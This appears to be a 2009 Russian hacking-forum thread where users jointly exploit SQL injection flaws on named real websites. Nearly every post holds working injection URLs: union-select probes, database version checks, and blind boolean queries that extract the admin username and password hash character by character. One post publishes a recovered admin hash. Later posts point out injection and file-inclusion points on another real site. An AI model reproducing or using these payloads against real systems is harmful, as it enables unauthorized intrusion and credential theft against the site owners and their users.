 |
|
23.03.2009, 01:03
|
|
Новичок
Регистрация: 08.02.2009
Сообщений: 24
С нами:
9081715
Репутация:
10
|
|
вот, наткнулся на это
Код:
http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1,2
Unknown column 'Status' in 'field list'
А если делать запросы следующих видов:
Код:
http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1,2--
Код:
http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1,2,3
Код:
http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1
Выдает:The used SELECT statements have a different number of columns
Не первый раз такое встречается, кто-нить знает, как это раскрутить? |
|
|
23.03.2009, 01:12
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
ПаВлУшКа,
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+concat _ws(0x2F,username,password)+from+admin+limit+0,1), 3,1))>1
|
|
|
|
23.03.2009, 01:26
|
|
Новичок
Регистрация: 08.02.2009
Сообщений: 24
С нами:
9081715
Репутация:
10
|
|
ElteRUS, это блинда чтоли? ТВой завпрос тоже ошибку выдает, как версию узнать для начала?
|
|
|
|
23.03.2009, 01:31
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами:
10226672
Репутация:
441
|
|
Сообщение от ПаВлУшКа
ElteRUS, это блинда чтоли? ТВой завпрос тоже ошибку выдает, как версию узнать для начала?
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+substring(version(),1,1)=4
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+substring(version(),1,1)=5
4
А в его запросе-Просто пробелы убери.
|
|
|
|
23.03.2009, 01:37
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
С нами:
9561436
Репутация:
462
|
|
Сообщение от ПаВлУшКа
ElteRUS, это блинда чтоли? ТВой завпрос тоже ошибку выдает, как версию узнать для начала?
Вытягивай имя:
Код:
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+username+from+admin+limit+0,1),5,1))%3E1
5 Символов, скорей всего admin
пасс:
Код:
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+password+from+admin+limit+0,1),32,1))%3E1
32 симола - хэш
|
|
|
|
23.03.2009, 02:24
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
С нами:
9561436
Репутация:
462
|
|
ПаВлУшКа
admin:3271d6889498c22a81b51aba93dc9307
|
|
|
|
23.03.2009, 02:38
|
|
Новичок
Регистрация: 08.02.2009
Сообщений: 24
С нами:
9081715
Репутация:
10
|
|
ph1l1ster, а как ты хеш узнал? Я правильно понял:
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+userna me+from+admin+limit+0,1),5,1))%3E1
Проверяет, если usermane содержит 5 и меньше символов, то выводится страница, а если больше, то ошибка??
|
|
|
|
23.03.2009, 02:45
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
С нами:
9561436
Репутация:
462
|
|
ПаВлУшКа
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+userna me+from+admin+limit+0,1),1,1))=97
первый символ ascii: 97 char: a
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+userna me+from+admin+limit+0,1),2,1))=100
второй символ ascii: 100 char:d
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+userna me+from+admin+limit+0,1),3,1))=109
третий символ ascii: 109 char: m
и тд.
|
|
|
|
23.03.2009, 17:02
|
|
Познающий
Регистрация: 28.10.2008
Сообщений: 43
С нами:
9229334
Репутация:
125
|
|
_http://top.warlib.ru/index.php?cid=1'/*
так же здесь есть инклуд:
_http://www.warlib.ru/index.php?id[]=000117
Раскручивание на замену нулл-байту ничего не дало, может у кого получится)
Последний раз редактировалось HIVER; 23.03.2009 в 17:06..
|
|
|
|
23.03.2009, 17:16
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Код:
http://top.warlib.ru/index.php?cid=1+and+substring(version(),1,1)=5
HIVER, пятая ветка. |
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
